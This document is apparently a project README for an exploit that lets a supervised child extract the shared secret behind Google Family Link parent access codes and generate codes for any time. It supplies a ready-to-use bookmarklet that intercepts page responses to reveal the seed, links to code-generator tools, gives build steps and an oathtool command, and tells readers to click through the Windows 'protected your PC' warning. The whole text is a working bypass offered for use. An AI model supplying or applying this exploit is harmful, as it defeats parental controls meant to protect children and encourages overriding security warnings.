An oversight in Google's Family Link allows a supervised child to gain access and generate unlimited "parent access codes" (TOTP-based) for the past, present, and future.
A parent access code is a 6-digit TOTP (time-based one time password), that typically only the parent should be able to generate.
The code can be used on Android and ChromeOS devices to
-
Unlock the device
-
Remove Google account (and by extension, family link)
-
Change daily limit for apps
-
Change downtime
-
Unblock apps
-
Skip 24-hour post graduation lock
-
Ensure you're signed into Chrome on your child account.
-
Save this bookmarklet (for mobile, make a bookmarklet for example.com and replace it with this).
javascript:void%20function(){javascript:globalThis.oldXHR=XMLHttpRequest;globalThis.XMLHttpRequest=function(){const%20a=new%20globalThis.oldXHR;return%20a.addEventListener(%22load%22,()=%3E{let%20b=JSON.parse(a.response);b[1][0].some(a=%3Ea.some(a=%3Ea.startsWith(%22BedtimeCardId%22)))%26%26alert(b[2][3][0])}),a}}();
-
Navigate to familylink.google.com and click the bookmarklet as fast as you can. Make sure to click it before the splash screen dissapears
-
You'll get a popup with a string starting with "AI", copy the string and store it somewhere. This is the shared secret for the parent access code.
You can put the string you just got into https://antilink.pages.dev/ and click enter to get your family link code.
Alternatively, you can use the GUI implementation at https://github.com/anti-link/fl_codegen_gui to generate the codes completely offline (and for a custom timestamp/any time in the future).
-
Navigate to https://github.com/anti-link/fl_codegen_gui/releases/ and download the most recent binary for your system.
-
Click on codegen_gui_windows_x86_64.exe, or the appropriate binary for your system.
-
Open the file once downloaded, you may get a "Windows protected your PC" popup. Click "More Info" and then "Run Anyway". The software is completely safe and you can review the source code at https://github.com/anti-link/fl_codegen_gui/ .
-
Now you can enter the shared secret from before, and a timestamp for any date in the future if you wish to generate codes in advance.
Yes, you can generate codes for any date in the future in case you might need them. Go to https://www.unixtimestamp.com/ and choose a time you'd like to have a parent access code for, then use the unix timestamp it makes in the GUI.
Compiling is turning the GUI code into an executable file locally on your machine. You should only compile if
-
We aren't providing a binary on the releases page for your OS
-
You just want to compile locally so you can trust the binary more
Otherwise, just download from the releases page on the GitHub.
-
Ensure you have a recent version of Rust installed
-
cargo build --release -
Find your binary in
target/release.
This exploit was made by the team at AntiLink
-
Spencerpogo - Rust implementation of the FL codegen.
-
r58playz - bookmarklet to obtain seed & website
-
rifting - founding antilink and making the Family Link Code generation GUI
-
Sleepachu - idea of reverse engineering the parent access code
-
Amaan - discovering sending of TOTP seed to child
-
ProgrammerIn-wonderland, VadSzil42, & mertcinarsah - Discussing and coming up with great ideas for exploits
As pointed out by a member of r/familylink, it's also worth nothing that oathtool can generate these codes too.
echo -n <shared secret> | base32oathtool -b -s 60s -N "`date +"%F %H:00:00 %Z"`" --totp <shared secret in base32>This isn't really practical but I can see some small uses for it